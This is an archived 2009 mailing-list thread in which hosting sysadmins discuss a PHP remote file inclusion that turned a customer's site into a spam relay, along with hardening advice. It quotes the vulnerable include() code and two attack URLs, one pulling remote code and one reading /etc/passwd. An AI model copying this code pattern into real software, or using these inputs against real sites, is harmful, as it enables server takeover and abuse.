subject:"\[swinog\] F\*ing Spammers and stupid customer code..."

Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Diskussionsfäden Romain Bourdy

And disable curl module BTW ;)


On Thu, Feb 19, 2009 at 4:41 PM, Radek Mrskos mrs...@volume.ch wrote:
 I think, this is what you should have anyway  in your php.ini


 allow_url_fopen = Off

 /Radek
___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Diskussionsfäden Philip Iezzi

luckily in this very single case! :)


On 19.02.2009, at 17:05, Mike Kellenberger wrote:

 luckily in this case: it's a windows server...

 regards,

 mike

 --  
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork


 -Ursprüngliche Nachricht-
 Von: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch 
 ] Im Auftrag von Gianni Carafa
 Gesendet: Donnerstag, 19. Februar 2009 17:04
 An: swi...@swinog.ch
 Betreff: Re: [swinog] F*ing Spammers and stupid customer code...

 Thats bad coding anyway :

 http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd



 Regards Gianni





 Radek Mrskos schrieb:
 I think, this is what you should have anyway  in your php.ini


 allow_url_fopen = Off

 /Radek
 Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:


 Hi all

 Just stopped our mail server from spitting out thousands of spam
 messages.

 We have a customer who has a site with the following (stupid) code  
 in
 his index.php:

 if($called_page_link!=)
 {
 $requested_file=$called_page_link;
 }

 include($requested_file);


 The f*ing spammer found out about this and called the page with:

 http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit
 ies.com/nimiuu/fuck.txt?


 Boom.

 Have I already told you that I hate spammers? :-)

 Oh well, one down - a few million to go...


 Regards,

 Mike

 -- 
 Mike Kellenberger   
 mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235  
 0700
 http://www.escapenet.ch   Skype  
 mikek70atwork


 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog


 Mit freundlichen Grüssen

 Radek Mrskos   Email: mrs...@volume.ch
 Baechlerstr. 12Tel:  +41 43 534 40 24
 CH-8802 Kilchberg  Mob: +41 79 219 68 66
 PGP:0x8CB69F6D  Fax: +41 86079 2196 866

 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog



___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Diskussionsfäden Mike Kellenberger

luckily in this case: it's a windows server...

regards,

mike

-- 
Mike Kellenberger  mike.kellenber...@escapenet.ch
Escapenet - the Web Company   Tel +41 52 235 0700
http://www.escapenet.ch   Skype mikek70atwork


-Ursprüngliche Nachricht-
Von: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] Im 
Auftrag von Gianni Carafa
Gesendet: Donnerstag, 19. Februar 2009 17:04
An: swi...@swinog.ch
Betreff: Re: [swinog] F*ing Spammers and stupid customer code...

Thats bad coding anyway :

http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd 



Regards Gianni





Radek Mrskos schrieb:
 I think, this is what you should have anyway  in your php.ini


 allow_url_fopen = Off

 /Radek
 Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:

   
 Hi all

 Just stopped our mail server from spitting out thousands of spam
 messages.

 We have a customer who has a site with the following (stupid) code in
 his index.php:

 if($called_page_link!=)
 {
  $requested_file=$called_page_link;
 }

 include($requested_file);


 The f*ing spammer found out about this and called the page with:

 http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit
 ies.com/nimiuu/fuck.txt?


 Boom.

 Have I already told you that I hate spammers? :-)

 Oh well, one down - a few million to go...


 Regards,

 Mike

 -- 
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork


 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
 

 Mit freundlichen Grüssen

 Radek Mrskos   Email: mrs...@volume.ch
 Baechlerstr. 12Tel:   +41 43 534 40 24
 CH-8802 Kilchberg  Mob: +41 79 219 68 66
 PGP:0x8CB69F6D   Fax: +41 86079 2196 866

 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
   
___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Diskussionsfäden Philip Iezzi

Hey Mike

First thing to remember: never get nervous about a spammer! There are  
too many out there. It's just not worth your time to get angry about  
such things...
It was our choice to get sysadmins - spamfighting is one of our big  
daily tasks. We might as well work for McDonalds - there's spam too.

Turning off allow_url_fopen  CURL might give you some headaches about  
customers that definitely need the option to fetch remote data. So  
here's my recommended setup (allow_url_include was introduced in PHP  
5.2.0):

allow_url_fopen = On
allow_url_include = Off

This will prevent you from the most stupid spammers, at least.
Next, work on some secure PHP setup, say: running PHP as CGI with  
Apache's SuExec.
You should also throttle emails sent by PHP, e.g. with a simple  
sendmail wrapper:
http://www.iezzi.ch/archives/258
http://www.iezzi.ch/archives/217

Regards,
Philip

-- 
Onlime Webhosting
Wachterweg 21
CH-8057 Zürich

phone  +41 44 508 0702
skype  ondalime
i...@onlime.ch - http://www.onlime.ch



On 19.02.2009, at 16:46, Mike Kellenberger wrote:

 totally correct, thanks! Looks like I'm the stupid SysAdmin as  
 well... :-)

 Regards,

 Mike

 -- 
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork


 -Ursprüngliche Nachricht-
 Von: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch 
 ] Im Auftrag von Radek Mrskos
 Gesendet: Donnerstag, 19. Februar 2009 16:41
 An: Mike Kellenberger
 Cc: swi...@swinog.ch
 Betreff: Re: [swinog] F*ing Spammers and stupid customer code...

 I think, this is what you should have anyway  in your php.ini


 allow_url_fopen = Off

 /Radek
 Am 19.02.2009 um 16:31 schrieb Mike Kellenberger:

 Hi all

 Just stopped our mail server from spitting out thousands of spam
 messages.

 We have a customer who has a site with the following (stupid) code in
 his index.php:

 if($called_page_link!=)
 {
  $requested_file=$called_page_link;
 }

 include($requested_file);


 The f*ing spammer found out about this and called the page with:

 http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit
 ies.com/nimiuu/fuck.txt?


 Boom.

 Have I already told you that I hate spammers? :-)

 Oh well, one down - a few million to go...


 Regards,

 Mike

 -- 
 Mike Kellenberger  mike.kellenber...@escapenet.ch
 Escapenet - the Web Company   Tel +41 52 235 0700
 http://www.escapenet.ch   Skype mikek70atwork


 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

 Mit freundlichen Grüssen

 Radek Mrskos   Email: mrs...@volume.ch
 Baechlerstr. 12Tel:   +41 43 534 40 24
 CH-8802 Kilchberg  Mob: +41 79 219 68 66
 PGP:0x8CB69F6D   Fax: +41 86079 2196 866

 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
 ___
 swinog mailing list
 swinog@lists.swinog.ch
 http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog





___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

Re: [swinog] F*ing Spammers and stupid customer code...

2009-02-19 Diskussionsfäden Daniel Kamm

Mike Kellenberger wrote:
 totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)

Actually, this problem is known since ages. I wonder, why you fall into 
that right now.

But what I really realise is, that this list is populated by Swiss 
Hosting Sysadmins from all important hosters. But they don't really 
share their experience and their actual problems. I mean in my old 
hosting days, I was glad to have some direct connections (for example 
per IRC), where I just could point out some troubles and solve them quickly.

So Hosting-Sysadmins, please get together and share your mind! This list 
is very network related and this is good so. Probably an other list 
would suit better for all hosters.

Cheerz,
  - Dan

PS: If I still was with a hoster, I would now take care of that. So 
maybe someone else can take the initiative.
___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog

Re: [swinog] F*ing Spammers and stupid customer code...

Re: [swinog] F*ing Spammers and stupid customer code...

Re: [swinog] F*ing Spammers and stupid customer code...

Re: [swinog] F*ing Spammers and stupid customer code...

Re: [swinog] F*ing Spammers and stupid customer code...

5 matches

Site Navigation

Mail list logo

Footer information